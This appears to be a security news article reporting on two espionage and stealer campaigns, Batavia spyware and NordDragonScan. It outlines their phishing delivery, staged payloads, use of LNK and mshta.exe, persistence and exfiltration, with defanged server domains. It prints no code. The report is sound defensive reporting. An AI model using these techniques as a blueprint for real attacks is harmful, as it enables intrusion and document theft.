Russian organizations have fallen victim to a sophisticated cyber espionage campaign that deploys a previously unknown Windows spyware dubbed Batavia.
Kaspersky, a leading cybersecurity firm, has identified the campaign which has been active since July 2024.
“The attack commences with deceptive emails containing malicious links, disguised as contract agreements,” stated the Russian cybersecurity company. “The primary objective of the attack is to infect organizations with the newly discovered Batavia spyware, which is designed to pilfer internal documents.”
The emails originate from the domain “oblast-ru[.]com,” allegedly controlled by the threat actors, leading recipients to download an archive file containing a Visual Basic Encoded script (.VBE).
Upon execution, the script gathers information about the compromised system and sends it to a remote server. Subsequently, a Delphi-written executable is retrieved from the server for further malicious activities.
The malware masquerades as a fake contract to distract victims while silently collecting system logs, office documents, and screenshots. It also extends its data exfiltration capabilities to removable devices connected to the compromised host.
In addition, the Delphi malware has the ability to download another payload targeting a wider range of file types for further data theft, including images, emails, presentations, and text documents.
The stolen data is transmitted to a different domain (“ru-exchange[.]com”), where an unknown executable is downloaded as a fourth-stage payload to escalate the attack.
Telemetry data from Kaspersky reveals that more than 100 users in several organizations have been targeted with phishing emails over the past year.
“Following the attack, Batavia exfiltrates the victim’s documents along with details such as installed programs, drivers, and operating system components,” Kaspersky noted.
Meanwhile, Fortinet FortiGuard Labs has uncovered a malicious campaign distributing a Windows stealer malware named NordDragonScan. The initial infection vector is suspected to be a phishing email containing a link that triggers the download of an RAR archive.
“NordDragonScan conducts an in-depth scan of the host, copying documents, harvesting Chrome and Firefox profiles, and capturing screenshots,” said security researcher Cara Lin.
Contained within the archive is a Windows shortcut (LNK) file that employs “mshta.exe” to execute a malicious HTML Application (HTA) from a remote server. This leads to the retrieval of a benign decoy document while a malicious .NET payload is deployed surreptitiously.
NordDragonScan establishes communications with a remote server (“kpuszkiev[.]com”), achieves persistence by altering Windows Registry settings, and conducts extensive reconnaissance to steal sensitive data, which is then exfiltrated back to the server via HTTP POST requests.
“The RAR file contains LNK calls that trigger mshta.exe to run a malicious HTA script, displaying a decoy document in Ukrainian,” explained Lin. “Ultimately, it silently installs its payload in the background. NordDragonScan is capable of scanning the host, taking screenshots, extracting documents and PDFs, and harvesting Chrome and Firefox profiles.”
